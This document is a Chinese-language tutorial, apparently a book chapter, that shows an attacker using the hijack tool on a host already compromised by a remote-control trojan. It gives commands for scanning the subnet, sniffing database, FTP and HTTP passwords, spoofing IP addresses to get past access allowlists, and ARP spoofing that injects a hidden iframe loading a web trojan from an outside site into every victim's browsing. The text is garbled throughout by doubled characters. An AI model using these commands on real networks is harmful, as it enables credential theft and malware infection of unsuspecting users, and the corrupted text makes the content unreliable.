带ARP欺骗攻击的渗透利刃--hijack16314.docx

前面介绍过一些入侵渗透用的小工具，如AIO和MT等，这些小工具的功能都非常强大，可以实现各种渗透入侵控制功能。但同时这些工具也有不足之处，即不具备ARP欺骗攻击的功能。 ARP欺骗攻击在内网渗透中的作用是极大的，因此这里介绍一个具有ARP欺骗功能的渗透小工具hijack。这个小巧但功能强大的工具，具备各种强大的功能，可以进行远程渗透入侵。1上传hijack，安装嗅探组件hijack解解压后，里面面有3个文件件："hijjack.eexe"、""winpccap.exxe"和"oold.exxe"。其中中"hijaack.exxe"和"wwinpcaap.exee"是必需的的。前者是程程序主文件，后后者是嗅探所所需Winppcap数据据包的自解压压版本。首先，攻击者要要将hijaack上传到到远程主机上上，可以使用用远程控制木木马或溢出SShell窗窗口进行上传传，如图8-67所示。这这里选择上传传到C盘根目目录下。返回到远程命令令控制窗口中中，执行命令令：1 dir c:hijacck.exee 如果显示文件，则则表示上传文文件成功。然然后执行"cc:winnpcap.exe"命命令，会自动动解压所需的的嗅探组件到到系统目录下下，如图8-68所示。在使用"hijjack.eexe"工具具进行渗透入入侵前，必须须安装winnpcap组组件，否则会会弹出错误提提示，如图88-69所示示。2查获远程网网络信息入侵控制的主机机，可能是单单独的一台主主机，也可能能位于某个网网络中；主机机上可能只安安装了一块网网卡，也可能能安装了多块块网块-全全面地了解远远程主机上的的网络信息是是进一步渗透透入侵攻击前前所必需的。在远程控制木马马的命令控制制窗口中，执执行命令：2 hijack /L 可以看到远程主主机上网卡的的设备名、IIP地址、MMAC物理地地址和子网掩掩码等各种网网络信息，如如图8-700所示。其中中，比较重要要的是"iddx"列显示示的信息，也也就是网卡索索引号。如果果是单网卡，那那么网卡索引引号为1。现在要扫描远程程主机子网中中所有的主机机IP地址，命命令格式为：3 hijack exe -d 网卡索索引号 /ss由于是单网卡，可可以直接执行行命令：4 hijack -d 1 /s 可以从远程主机机所在的子网网中扫描并显显示所有主机机的IP地址址，以及其网网卡的MACC物理地址。这这里可以看到到，在子网中中有3台主机机，如图8-71所示。3嗅探子网主主机的密码在进行渗透入侵侵时，嗅探具具有非常重要要的作用，尤尤其是在入侵侵网站服务器器网络时。利利用嗅探，可可以获得子网网中其他主机机的管理员密密码，或者是是网站登录密密码、邮箱或或FTP登录录密码等。1）嗅探数据库库的密码例如，控制网站站服务器主机机内网的IPP地址是"1192.1668.1.88"，在子网网中另一台主主机的IP地地址是"1992.1688.1.100"，该主机机是网站的数数据库服务器器。攻击者想想获得数据库库的连接密码码，可以嗅探探主机"1992.1688.1.6""的所有网络络连接数据。在远程控制木马马的命令控制制窗口中，执执行嗅探命令令（见图8-72）5 hijack -d 1 -O paass.loog 1922.168.1.* 6 1922.168.1.10 该命令可以嗅探探所有"1992.1688.1.*""网段的主机机与数据库服服务器"1992.1688.1.6""之间的网络络信息数据，并并从中捕获密密码，保存在在"passs.log""文件中。也可以直接使用用如下命令：7 hijack -d 1 -O paass.loog 1922.168.1.* 192.1168.1.1嗅探所有主机与与网关服务器器之间的数据据交换，从而而获得其登录录密码并直接接从外网登录录网关。以上命令，只是是进行单向嗅嗅探，我们也也可以添加参参数"-f""进行双向嗅嗅探，命令格格式如下：8 hijack -d 1 -f -OO passs.log 192.1168.1.* 1992.1688.1.100 另外，我们也可可以设置嗅探探指定协议的的密码，如嗅嗅探FTP密密码，可执行行命令：9 hijack -d 1 -r -ff -O ppass.llog 1992.1688.1.* 192.168.11.10 ""USER|PASS"" "tcpp and dst pport 221"要嗅探常见的HHTTP密码码，可执行命命令：10 hijack -d 1 -r -ff -O ppass.llog 1992.1688.1.* 192.1168.1.10 "uusernaame=|passsword=" "tccp annd dstt portt 80" 2）查看嗅探数数据执行了后台嗅探探后，嗅探的的结果会保存存在远程主机机上。显示嗅嗅探结果的命命令为：10 hijack.exe -I passs.logg 执行命令后，就就可以看到嗅嗅探记录文件件中保存的所所有嗅探数据据了，如图88-73所示示，通过分析析查看即可获获得密码。3）IP地址欺欺骗攻击，突突破内网连接接限制通过前面嗅探到到的密码可以以进行远程连连接，以控制制子网中的其其他主机。但但是这些子网网中的主机，往往往通过防火火墙或其他方方式设置了连连接限制，只只允许与指定定IP地址的的主机进行连连接，此时可可以通过hiijack的的IP地址欺欺骗功能来渗渗透入侵连接接受限制的主主机。这里假设在子网网内某台计算算机公网的IIP地址为""202.998.1988.33"，该该主机设置了了IP地址限限制，只允许许IP地址""202.998.1988.77"访访问，而攻击击者本机的IIP地址是""202.1172.688.12"，如如果想入侵这这台连接受制制限的主机，可可以执行命令令（见图8-74）：11 hijack -d 1 -z 2002.98.198.333 2022.98.1198.1 202.1172.688.12 2202.988.198.77其中，"2022.98.1198.1""是该网段的的网关IP。执执行该命令后后，攻击者就就可以突破IIP地址限制制，连接上原原本受限制的的主机了。4）ARP欺骗骗攻击在渗透入侵攻击击中，如果无无法进行嗅探探，或者难以以突破内网与与外网，那么么ARP欺骗骗攻击就可以以大显身手了了。hijaack的ARRP欺骗攻击击可以在子网网内其他主机机与网关的数数据交换中，任任意添加修改改网络数据，以以达到挂马攻攻击的目的。例如，已经有了了一个网页木木马，地址为为"httpp:/（1）编写规则则文件。打开开记事本，编编写如下内容容的文本文件件：12 - 13 HTML> 14 - 15 <iframee src=http:/www.binghhexijiian.coom/1.hhtm wiidth=0 heighht=0>ifraame>HTTML> 将文件保存为""job.ttxt"，然然后上传到远远程主机与hhijackk所在的文件件夹下，该文文件作为ARRP欺骗规则则文件。（2）实施ARRP欺骗攻击击。在远程命命令控制窗口口中，执行如如下命令（见见图8-755）：16 hijack -d 1 -v -pp 80 -S 1000 -F jjob.txxt 17 1922.168.1.1 1192.1668.1.* 命令执行后即可可对子网内的的所有主机进进行ARP欺欺骗攻击了。当当子网中的所所有主机访问问任意网页时时，能够正常常打开网页。但但是，网页中中会被嵌入网网页木马，从从而被木马攻攻击。除了上面的攻击击实例外，hhijackk还可以进行行HTTP会会话捕获、DDNS欺骗、网网速限制和跨跨网段欺骗等等强大的渗透透攻击功能，我我们可以直接接执行"hiijack -h"命令令来查看其详详细的命令帮帮助信息